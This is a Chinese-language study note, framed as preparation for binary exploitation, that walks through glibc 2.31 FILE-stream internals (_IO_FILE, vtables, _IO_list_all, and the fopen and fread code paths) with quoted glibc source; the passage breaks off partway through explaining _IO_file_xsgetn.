# Pwn-File structure note
> Author: 堇姬Naup
## 前言
glibc提供很多I/O操作,主要就是去打這些東西
printf
scanf
fopen
fread
fwrite
...
主要看的source code:
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h
## high level overview
![image](https://hackmd.io/_uploads/rk7zdFu9R.png)
每次用printf等I/O function都syscall一次有點浪費時間,加個buffer優化他,等到buffer積累到一個程度,就輸出
![image](https://hackmd.io/_uploads/H1hM_Fdq0.png)
## 以前會看到的
常看到的這兩行,是設定不要有buffer,這樣IO會比較單純
```c=
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
```
## File
`stdin`、`stdout`、`stderr` 這三個指標都指向 `_IO_FILE_plus` 這個struct
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/stdio.c#L33
```c
FILE *stdin = (FILE *) &_IO_2_1_stdin_;
FILE *stdout = (FILE *) &_IO_2_1_stdout_;
FILE *stderr = (FILE *) &_IO_2_1_stderr_;
```
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L149
```c
extern struct _IO_FILE_plus _IO_2_1_stdin_;
extern struct _IO_FILE_plus _IO_2_1_stdout_;
extern struct _IO_FILE_plus _IO_2_1_stderr_;
```
`_IO_FILE_plus`是個這樣的struct,裡面包含了FILE這個struct跟vtable
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libioP.h#L324
```c
struct _IO_FILE_plus
{
FILE file;
const struct _IO_jump_t *vtable;
};
```
去追FILE這個struct
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/bits/types/FILE.h#L7
```c
typedef struct _IO_FILE FILE;
```
裡面有很多的flag,並且有很多buffer,大致上有兩種
- read buffer
- write buffer
read base是buffer開始
read end是buffer結束
read ptr是buffer當前用到的位置
以此類推
繼續往下看看到`struct _IO_FILE *_chain;`把IO_FILE串成一條chain
`int _fileno` 是這個FILE對應的文件描述符(file descriptor),標準的三個stream對應如下
|num|代表|
|---|---|
|0|stdin|
|1|stdout|
|2|stderr|
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/bits/types/struct_FILE.h#L49
```c
struct _IO_FILE
{
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr; /* Current read pointer */
char *_IO_read_end; /* End of get area. */
char *_IO_read_base; /* Start of putback+get area. */
char *_IO_write_base; /* Start of put area. */
char *_IO_write_ptr; /* Current put pointer. */
char *_IO_write_end; /* End of put area. */
char *_IO_buf_base; /* Start of reserve area. */
char *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno; //文件描述符
int _flags2;
__off_t _old_offset; /* This used to be _offset but it's too small. */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock; //同步用
#ifdef _IO_USE_OLD_IO_FILE
};
```
這邊可以看到他define了很多跟flag有關的東西,你可以看到很多magic number可以設定,像是IO file不能read等
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L67
```c
/* Magic number and bits for the _flags field. The magic number is
mostly vestigial, but preserved for compatibility. It occupies the
high 16 bits of _flags; the low 16 bits are actual flag bits. */
#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 0x0001 /* Don't deallocate buffer on close. */
#define _IO_UNBUFFERED 0x0002
#define _IO_NO_READS 0x0004 /* Reading not allowed. */
#define _IO_NO_WRITES 0x0008 /* Writing not allowed. */
#define _IO_EOF_SEEN 0x0010
#define _IO_ERR_SEEN 0x0020
#define _IO_DELETE_DONT_CLOSE 0x0040 /* Don't call close(_fileno) on close. */
#define _IO_LINKED 0x0080 /* In the list of all open files. */
#define _IO_IN_BACKUP 0x0100
#define _IO_LINE_BUF 0x0200
#define _IO_TIED_PUT_GET 0x0400 /* Put and get pointer move in unison. */
#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
/* 0x4000 No longer used, reserved for compat. */
#define _IO_USER_LOCK 0x8000
```
再來去追vtable
簡單理解成一個指標table,存放各個函數指標,要找對應函數就會到vtable查表
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libioP.h#L293
```c
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
};
```
## file stream
我們在open新的file時候,fd=3,之後以此類推,原因是前面是stdin、stdout、stderr(0、1、2),他用`_IO_list_all`的單向鏈表儲存
![image](https://hackmd.io/_uploads/rJn2EuMF0.png)
這裡面就是IO_FILE這個struct
## definition
這邊來看一下,實際define的地方
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/stdfiles.c#L35
```c
#ifdef _IO_MTSAFE_IO
# define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \
static _IO_lock_t _IO_stdfile_##FD##_lock = _IO_lock_initializer; \
static struct _IO_wide_data _IO_wide_data_##FD \
= { ._wide_vtable = &_IO_wfile_jumps }; \
struct _IO_FILE_plus NAME \
= {FILEBUF_LITERAL(CHAIN, FLAGS, FD, &_IO_wide_data_##FD), \
&_IO_file_jumps};
#else
# define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \
static struct _IO_wide_data _IO_wide_data_##FD \
= { ._wide_vtable = &_IO_wfile_jumps }; \
struct _IO_FILE_plus NAME \
= {FILEBUF_LITERAL(CHAIN, FLAGS, FD, &_IO_wide_data_##FD), \
&_IO_file_jumps};
#endif
```
```c
DEF_STDFILE(_IO_2_1_stdin_, 0, 0, _IO_NO_WRITES);
DEF_STDFILE(_IO_2_1_stdout_, 1, &_IO_2_1_stdin_, _IO_NO_READS);
DEF_STDFILE(_IO_2_1_stderr_, 2, &_IO_2_1_stdout_, _IO_NO_READS+_IO_UNBUFFERED);
struct _IO_FILE_plus *_IO_list_all = &_IO_2_1_stderr_;
```
第一欄 -> 名字
第二欄 -> fd
第三欄 -> 鏈表 `(_IO_list_all -> _IO_2_1_stderr_ -> _IO_2_1_stdout_ -> _IO_2_1_stdin_ -> 0)`
第四欄 -> 各類FLAG
vtable被設為`_IO_file_jumps`
這邊明確定義了每個函數的指標
```c
const struct _IO_jump_t _IO_file_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_file_finish),
JUMP_INIT(overflow, _IO_file_overflow),
JUMP_INIT(underflow, _IO_file_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_default_pbackfail),
JUMP_INIT(xsputn, _IO_file_xsputn),
JUMP_INIT(xsgetn, _IO_file_xsgetn),
JUMP_INIT(seekoff, _IO_new_file_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_new_file_setbuf),
JUMP_INIT(sync, _IO_new_file_sync),
JUMP_INIT(doallocate, _IO_file_doallocate),
JUMP_INIT(read, _IO_file_read),
JUMP_INIT(write, _IO_new_file_write),
JUMP_INIT(seek, _IO_file_seek),
JUMP_INIT(close, _IO_file_close),
JUMP_INIT(stat, _IO_file_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};
libc_hidden_data_def (_IO_file_jumps)
```
## I/O manipulation
既然已經知道了FILE的結構,那接下來來看glibc提供的操作FILE的函數
(這部分有點複雜,可以直接看總結)
### fopen
大致流程如下:
* malloc 分配 FILE + vtable + lock 空間
* 初始化 FILE,將 vtable 設置為 glibc 中已經寫好的各個函數
* 將 FILE 鏈入 _IO_list_all
* 系統調用 open 打開文件,並設置文件描述符號
接下來來看source code
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/stdio.h#L242
```c
/* Open a file and create a new stream for it.
This function is a possible cancellation point and therefore not
marked with __THROW. */
extern FILE *fopen (const char *__restrict __filename,
const char *__restrict __modes) __wur;
```
實際定義fopen
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/iofopen.c#L83
```c
FILE *
_IO_new_fopen (const char *filename, const char *mode)
{
return __fopen_internal (filename, mode, 1);
}
```
他調用了 __fopen_internal
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/iofopen.c#L55
```c
FILE *
__fopen_internal (const char *filename, const char *mode, int is32)
{
struct locked_FILE
{
struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
struct _IO_wide_data wd;
} *new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));
if (new_f == NULL)
return NULL;
#ifdef _IO_MTSAFE_IO
new_f->fp.file._lock = &new_f->lock;
#endif
_IO_no_init (&new_f->fp.file, 0, 0, &new_f->wd, &_IO_wfile_jumps);
_IO_JUMPS (&new_f->fp) = &_IO_file_jumps;
_IO_new_file_init_internal (&new_f->fp);
if (_IO_file_fopen ((FILE *) new_f, filename, mode, is32) != NULL)
return __fopen_maybe_mmap (&new_f->fp.file);
_IO_un_link (&new_f->fp);
free (new_f);
return NULL;
}
```
filename -> 要打開的文件。
mode -> 模式(如 "r", "w", "a")
is32 -> 32 bits or 64 bits
定義了一個 `locked_FILE` struct(在 `_IO_MTSAFE_IO` 下裡面會包含一個鎖)
```c
struct locked_FILE
{
struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
struct _IO_wide_data wd;
} *new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));
```
包含了 FILE_plus(file跟vtable) 跟 _IO_wide_data (操作寬字符數據)
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L122
並且malloc了一塊chunk new_f,來存放該struct
接著調用 `_IO_no_init (&new_f->fp.file, 0, 0, &new_f->wd, &_IO_wfile_jumps);`
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L561
```c
void
_IO_no_init (FILE *fp, int flags, int orientation,
struct _IO_wide_data *wd, const struct _IO_jump_t *jmp)
{
_IO_old_init (fp, flags);
fp->_mode = orientation;
if (orientation >= 0)
{
fp->_wide_data = wd;
fp->_wide_data->_IO_buf_base = NULL;
fp->_wide_data->_IO_buf_end = NULL;
fp->_wide_data->_IO_read_base = NULL;
fp->_wide_data->_IO_read_ptr = NULL;
fp->_wide_data->_IO_read_end = NULL;
fp->_wide_data->_IO_write_base = NULL;
fp->_wide_data->_IO_write_ptr = NULL;
fp->_wide_data->_IO_write_end = NULL;
fp->_wide_data->_IO_save_base = NULL;
fp->_wide_data->_IO_backup_base = NULL;
fp->_wide_data->_IO_save_end = NULL;
fp->_wide_data->_wide_vtable = jmp;
}
else
/* Cause predictable crash when a wide function is called on a byte
stream. */
fp->_wide_data = (struct _IO_wide_data *) -1L;
fp->_freeres_list = NULL;
}
```
這部分將一個FILE結構進行初始化,並進入了`_IO_old_init`
```c
void
_IO_old_init (FILE *fp, int flags)
{
fp->_flags = _IO_MAGIC|flags;
fp->_flags2 = 0;
if (stdio_needs_locking)
fp->_flags2 |= _IO_FLAGS2_NEED_LOCK;
fp->_IO_buf_base = NULL;
fp->_IO_buf_end = NULL;
fp->_IO_read_base = NULL;
fp->_IO_read_ptr = NULL;
fp->_IO_read_end = NULL;
fp->_IO_write_base = NULL;
fp->_IO_write_ptr = NULL;
fp->_IO_write_end = NULL;
fp->_chain = NULL; /* Not necessary. */
fp->_IO_save_base = NULL;
fp->_IO_backup_base = NULL;
fp->_IO_save_end = NULL;
fp->_markers = NULL;
fp->_cur_column = 0;
#if _IO_JUMPS_OFFSET
fp->_vtable_offset = 0;
#endif
#ifdef _IO_MTSAFE_IO
if (fp->_lock != NULL)
_IO_lock_init (*fp->_lock);
#endif
}
```
_IO_file_jumps 就是vtable
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1433
```c
const struct _IO_jump_t _IO_file_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_file_finish),
JUMP_INIT(overflow, _IO_file_overflow),
JUMP_INIT(underflow, _IO_file_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_default_pbackfail),
JUMP_INIT(xsputn, _IO_file_xsputn),
JUMP_INIT(xsgetn, _IO_file_xsgetn),
JUMP_INIT(seekoff, _IO_new_file_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_new_file_setbuf),
JUMP_INIT(sync, _IO_new_file_sync),
JUMP_INIT(doallocate, _IO_file_doallocate),
JUMP_INIT(read, _IO_file_read),
JUMP_INIT(write, _IO_new_file_write),
JUMP_INIT(seek, _IO_file_seek),
JUMP_INIT(close, _IO_file_close),
JUMP_INIT(stat, _IO_file_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};
libc_hidden_data_def (_IO_file_jumps)
```
接著調用`_IO_new_file_init_internal`
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L105
```c
void
_IO_new_file_init_internal (struct _IO_FILE_plus *fp)
{
/* POSIX.1 允許使用另一個文件句柄來改變我們文件描述符的位置。
因此,在第一次執行 fseek 操作之前(並且直到隨後的 fflush 操作),
我們實際上無法確定文件的實際位置。 */
fp->file._offset = _IO_pos_BAD;
// 設定文件的標誌,表示文件buffer已關閉
fp->file._flags |= CLOSED_FILEBUF_FLAGS;
// 將這個文件指針鏈入到鏈表中
_IO_link_in (fp);
// 將文件描述符設為 -1,表示文件尚未關聯到有效的文件描述符
fp->file._fileno = -1;
}
```
以上內容都是準備工作
接下來呼叫`_IO_file_fopen`(是`_IO_new_file_fopen`別稱),準備開始開檔案了
```c
libc_hidden_ver (_IO_new_file_fopen, _IO_file_fopen)
```
來看` _IO_new_file_fopen`,有點長,這邊分段看
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L211
基本設定
```c
FILE *
_IO_new_file_fopen (FILE *fp, const char *filename, const char *mode,
int is32not64)
{
int oflags = 0, omode;
int read_write;
int oprot = 0666;
int i;
FILE *result;
const char *cs;
const char *last_recognized;
```
確認文件是否已經開啟
```c
if (_IO_file_is_open (fp))
return 0;
```
根據mode進行設定
```c
// 根據 mode 的第一個字元決定文件打開方式
switch (*mode)
{
case 'r':
omode = O_RDONLY; // 只讀模式
read_write = _IO_NO_WRITES; // 禁止寫操作
break;
case 'w':
omode = O_WRONLY; // 只寫模式
oflags = O_CREAT|O_TRUNC; // 如果文件不存在,創建文件並截斷文件
read_write = _IO_NO_READS; // 禁止讀操作
break;
case 'a':
omode = O_WRONLY; // 追加模式
oflags = O_CREAT|O_APPEND; // 如果文件不存在,創建文件並追加到文件末尾
read_write = _IO_NO_READS|_IO_IS_APPENDING; // 禁止讀操作並設置追加標誌
break;
default:
__set_errno (EINVAL); // 無效參數錯誤
return NULL;
}
```
```c
// 解析 mode 字串中的其他參數
for (i = 1; i < 7; ++i)
{
switch (*++mode)
{
case '\0':
break;
case '+':
omode = O_RDWR; // 讀寫模式
read_write &= _IO_IS_APPENDING; // 如果是追加模式,保持標誌不變
last_recognized = mode;
continue;
case 'x':
oflags |= O_EXCL; // 獨佔創建,若文件已存在則返回錯誤
last_recognized = mode;
continue;
case 'b':
last_recognized = mode; // 二進制模式(在 UNIX 系統中通常無影響)
continue;
case 'm':
fp->_flags2 |= _IO_FLAGS2_MMAP; // 設置內存映射標誌
continue;
case 'c':
fp->_flags2 |= _IO_FLAGS2_NOTCANCEL; // 設置不允許取消標誌
continue;
case 'e':
oflags |= O_CLOEXEC; // 設置 close-on-exec 標誌
fp->_flags2 |= _IO_FLAGS2_CLOEXEC;
continue;
default:
/* 忽略其他未知標誌 */
continue;
}
break;
}
```
之後呼叫了`_IO_file_open`
```c
result = _IO_file_open (fp, filename, omode|oflags, oprot, read_write,
is32not64);
```
使用syscall,去打開文件,並且fileno設為文件描述符,並將該struct鏈入
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L180
```c
FILE *
_IO_file_open (FILE *fp, const char *filename, int posix_mode, int prot,
int read_write, int is32not64)
{
int fdesc;
// 如果 FILE 結構體中的 _flags2 包含 _IO_FLAGS2_NOTCANCEL 標誌
if (__glibc_unlikely (fp->_flags2 & _IO_FLAGS2_NOTCANCEL))
// 使用不會被取消的版本的 open 系統調用
fdesc = __open_nocancel (filename,
posix_mode | (is32not64 ? 0 : O_LARGEFILE), prot);
else
// 否則使用標準的 open 系統調用
fdesc = __open (filename, posix_mode | (is32not64 ? 0 : O_LARGEFILE), prot);
// 如果文件描述符小於 0,表示打開文件失敗,返回 NULL
if (fdesc < 0)
return NULL;
// 將打開的文件描述符存儲在 FILE 結構體的 _fileno 成員中
fp->_fileno = fdesc;
// 設置 FILE 結構體中的相關標誌
_IO_mask_flags (fp, read_write, _IO_NO_READS + _IO_NO_WRITES + _IO_IS_APPENDING);
// 如果是追加模式且禁止讀取,將文件指針移動到文件末尾
if ((read_write & (_IO_IS_APPENDING | _IO_NO_READS))
== (_IO_IS_APPENDING | _IO_NO_READS))
{
// 將文件指針移動到文件末尾,但不更新文件指針的緩存
off64_t new_pos = _IO_SYSSEEK (fp, 0, _IO_seek_end);
// 如果移動失敗且錯誤不是 ESPIPE,關閉文件描述符並返回 NULL
if (new_pos == _IO_pos_BAD && errno != ESPIPE)
{
__close_nocancel (fdesc);
return NULL;
}
}
// 將 FILE 結構體鏈接到內部的鏈表中
_IO_link_in ((struct _IO_FILE_plus *) fp);
// 返回 FILE 指針
return fp;
}
libc_hidden_def (_IO_file_open)
```
這裡雖然又呼叫了一次 `_IO_link_in`,但不會重複鏈入,原因是 `_IO_link_in` 會先檢查 `_IO_LINKED` 這個flag,已經鏈入過就什麼都不做
```c
void
_IO_link_in (struct _IO_FILE_plus *fp)
{
if ((fp->file._flags & _IO_LINKED) == 0)
{
fp->file._flags |= _IO_LINKED;
#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
run_fp = (FILE *) fp;
_IO_flockfile ((FILE *) fp);
#endif
fp->file._chain = (FILE *) _IO_list_all;
_IO_list_all = fp;
#ifdef _IO_MTSAFE_IO
_IO_funlockfile ((FILE *) fp);
run_fp = NULL;
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif
}
}
libc_hidden_def (_IO_link_in)
```
剩下的不是很重要
```c
if (result != NULL)
{
// 檢查 mode 字串中是否指定了字符集轉換
cs = strstr (last_recognized + 1, ",ccs=");
if (cs != NULL)
{
// 載入適當的轉換並設置為寬字符模式
struct gconv_fcts fcts;
struct _IO_codecvt *cc;
char *endp = __strchrnul (cs + 5, ',');
char *ccs = malloc (endp - (cs + 5) + 3);
if (ccs == NULL)
{
int malloc_err = errno; // 獲取 malloc 錯誤
(void) _IO_file_close_it (fp);
__set_errno (malloc_err);
return NULL;
}
*((char *) __mempcpy (ccs, cs + 5, endp - (cs + 5))) = '\0';
strip (ccs, ccs);
if (__wcsmbs_named_conv (&fcts, ccs[2] == '\0'
? upstr (ccs, cs + 5) : ccs) != 0)
{
// 轉換模組加載失敗,無法繼續
(void) _IO_file_close_it (fp);
free (ccs);
__set_errno (EINVAL);
return NULL;
}
free (ccs);
// 確保轉換步驟數目為 1
assert (fcts.towc_nsteps == 1);
assert (fcts.tomb_nsteps == 1);
// 初始化寬字符讀寫指針
fp->_wide_data->_IO_read_ptr = fp->_wide_data->_IO_read_end;
fp->_wide_data->_IO_write_ptr = fp->_wide_data->_IO_write_base;
// 清除狀態,重新開始
memset (&fp->_wide_data->_IO_state, '\0', sizeof (__mbstate_t));
memset (&fp->_wide_data->_IO_last_state, '\0', sizeof (__mbstate_t));
// 設置編碼轉換函式
cc = fp->_codecvt = &fp->_wide_data->_codecvt;
cc->__cd_in.step = fcts.towc;
cc->__cd_in.step_data.__invocation_counter = 0;
cc->__cd_in.step_data.__internal_use = 1;
cc->__cd_in.step_data.__flags = __GCONV_IS_LAST;
cc->__cd_in.step_data.__statep = &result->_wide_data->_IO_state;
cc->__cd_out.step = fcts.tomb;
cc->__cd_out.step_data.__invocation_counter = 0;
cc->__cd_out.step_data.__internal_use = 1;
cc->__cd_out.step_data.__flags = __GCONV_IS_LAST | __GCONV_TRANSLIT;
cc->__cd_out.step_data.__statep = &result->_wide_data->_IO_state;
// 從現在開始,使用寬字符回調函式
_IO_JUMPS_FILE_plus (fp) = fp->_wide_data->_wide_vtable;
// 設置模式
result->_mode = 1;
}
}
return result;
```
總結一下
![image](https://hackmd.io/_uploads/B10R5GE3R.png)
### fread
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/stdio.h#L646
```c
/* Read chunks of generic data from STREAM.
This function is a possible cancellation point and therefore not
marked with __THROW. */
extern size_t fread (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) __wur;
```
宣告了fread的地方
接下來去找實際定義fread的部分
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/iofread.c#L29
```c
size_t
_IO_fread (void *buf, size_t size, size_t count, FILE *fp)
{
size_t bytes_requested = size * count;
size_t bytes_read;
CHECK_FILE (fp, 0);
if (bytes_requested == 0)
return 0;
_IO_acquire_lock (fp);
bytes_read = _IO_sgetn (fp, (char *) buf, bytes_requested);
_IO_release_lock (fp);
return bytes_requested == bytes_read ? count : bytes_read / size;
}
```
buf -> 儲存文件的地方
size -> 每個元素的大小(實際讀取的總大小是 size * count)
count 是要讀取元素個數
FILE *fp -> 讀的文件pointer
_IO_acquire_lock、_IO_release_lock -> 鎖跟解鎖,防止race
CHECK_FILE -> 一個define -> 檢查文件指標的有效性
```c
#ifdef IO_DEBUG
# define CHECK_FILE(FILE, RET) do { \
if ((FILE) == NULL \
|| ((FILE)->_flags & _IO_MAGIC_MASK) != _IO_MAGIC) \
{ \
__set_errno (EINVAL); \
return RET; \
} \
} while (0)
#else
# define CHECK_FILE(FILE, RET) do { } while (0)
#endif
```
這邊順便補一下各種error
https://elixir.bootlin.com/glibc/glibc-2.31/source/sysdeps/mach/hurd/bits/errno.h#L254
這部分是實際上執行fread的部分,他調用了_IO_sgetn
```c
bytes_read = _IO_sgetn(fp, (char *)buf, bytes_requested);
```
調用 _IO_XSGETN
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L407
```c
size_t
_IO_sgetn (FILE *fp, void *data, size_t n)
{
/* FIXME handle putback buffer here! */
return _IO_XSGETN (fp, data, n);
}
libc_hidden_def (_IO_sgetn)
```
這幾段簡單來說就是要去抓到vtable中的__xsgetn
```c
#define _IO_XSGETN(FP, DATA, N) JUMP2 (__xsgetn, FP, DATA, N)
```
```c
#define JUMP2(FUNC, THIS, X1, X2) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2)
```
```c
#if _IO_JUMPS_OFFSET
# define _IO_JUMPS_FUNC(THIS) \
(IO_validate_vtable \
(*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \
+ (THIS)->_vtable_offset)))
# define _IO_JUMPS_FUNC_UPDATE(THIS, VTABLE) \
(*(const struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \
+ (THIS)->_vtable_offset) = (VTABLE))
# define _IO_vtable_offset(THIS) (THIS)->_vtable_offset
#else
# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))
# define _IO_JUMPS_FUNC_UPDATE(THIS, VTABLE) \
(_IO_JUMPS_FILE_plus (THIS) = (VTABLE))
# define _IO_vtable_offset(THIS) 0
#endif
```
```c
#define _IO_JUMPS_FILE_plus(THIS) \
_IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE_plus, vtable)
```
```c
#define _IO_CAST_FIELD_ACCESS(THIS, TYPE, MEMBER) \
(*(_IO_MEMBER_TYPE (TYPE, MEMBER) *)(((char *) (THIS)) \
+ offsetof(TYPE, MEMBER)))
```
實際上__xsgetn是`_IO_file_xsgetn`,這邊有寫
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1433
這邊追進去看_IO_file_xsgetn
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1272
```c
size_t
_IO_file_xsgetn (FILE *fp, void *data, size_t n)
{
size_t want, have;
ssize_t count;
char *s = data;
want = n;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
while (want > 0)
{
have = fp->_IO_read_end - fp->_IO_read_ptr;
if (want <= have)
{
memcpy (s, fp->_IO_read_ptr, want);
fp->_IO_read_ptr += want;
want = 0;
}
else
{
if (have > 0)
{
s = __mempcpy (s, fp->_IO_read_ptr, have);
want -= have;
fp->_IO_read_ptr += have;
}
/* Check for backup and repeat */
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
continue;
}
/* If we now want less than a buffer, underflow and repeat
the copy. Otherwise, _IO_SYSREAD directly to
the user buffer. */
if (fp->_IO_buf_base
&& want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
{
if (__underflow (fp) == EOF)
break;
continue;
}
/* These must be set before the sysread as we might longjmp out
waiting for input. */
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
_IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
/* Try to maintain alignment: read a whole number of blocks. */
count = want;
if (fp->_IO_buf_base)
{
size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
if (block_size >= 128)
count -= want % block_size;
}
count = _IO_SYSREAD (fp, s, count);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN;
break;
}
s += count;
want -= count;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
}
}
return n - want;
}
libc_hidden_def (_IO_file_xsgetn)
```
這邊一樣慢慢看
首先是他會檢查是否已經分配buffer了,如果沒有分配就進入,先檢查有沒有backup buffer,如果沒有的話就直接進`_IO_doallocbuf (fp)`,分配一塊
若有backup buffer就把他free掉
補一下backup buffer,他會被`_IO_save_base`指向,若需要回退回原來buffer的狀況,就會根據backup來還原
```c
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
```
_IO_doallocbuf
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L342
先檢查是否已經有分配buffer了,如果有就return
經過一些簡單檢查後會呼叫 _IO_DOALLOCATE
```c
void
_IO_doallocbuf (FILE *fp)
{
if (fp->_IO_buf_base)
return;
if (!(fp->_flags & _IO_UNBUFFERED) || fp->_mode > 0)
if (_IO_DOALLOCATE (fp) != EOF)
return;
_IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
}
libc_hidden_def (_IO_doallocbuf)
```
_IO_DOALLOCATE 實際上會是 _IO_file_doallocate
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1433
```c
JUMP_INIT(doallocate, _IO_file_doallocate),
```
所以追進去
這裡會分配一塊buffer
_IO_SYSSTAT 會獲取該file狀態
調用malloc給一塊buffer
_IO_setb 會賦值給buffer pointer
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L327
```c
int
_IO_file_doallocate (FILE *fp)
{
size_t size;
char *p;
struct stat64 st;
size = BUFSIZ;
if (fp->_fileno >= 0 && __builtin_expect (_IO_SYSSTAT (fp, &st), 0) >= 0)
{
if (S_ISCHR (st.st_mode))
{
/* Possibly a tty. */
if (
#ifdef DEV_TTY_P
DEV_TTY_P (&st) ||
#endif
local_isatty (fp->_fileno))
fp->_flags |= _IO_LINE_BUF;
}
#if defined _STATBUF_ST_BLKSIZE
if (st.st_blksize > 0 && st.st_blksize < BUFSIZ)
size = st.st_blksize;
#endif
}
p = malloc (size);
if (__glibc_unlikely (p == NULL))
return EOF;
_IO_setb (fp, p, p + size, 1);
return 1;
}
libc_hidden_def (_IO_file_doallocate)
```
以上是分配空間
接下來要開始讀取
want -> 想要讀取的data量
have -> buffer中還沒被讀走的data量(have = fp->_IO_read_end - fp->_IO_read_ptr)
如果buffer中剩餘的data >= 想讀取的data量
直接把buffer裡的data複製到目的地(s)
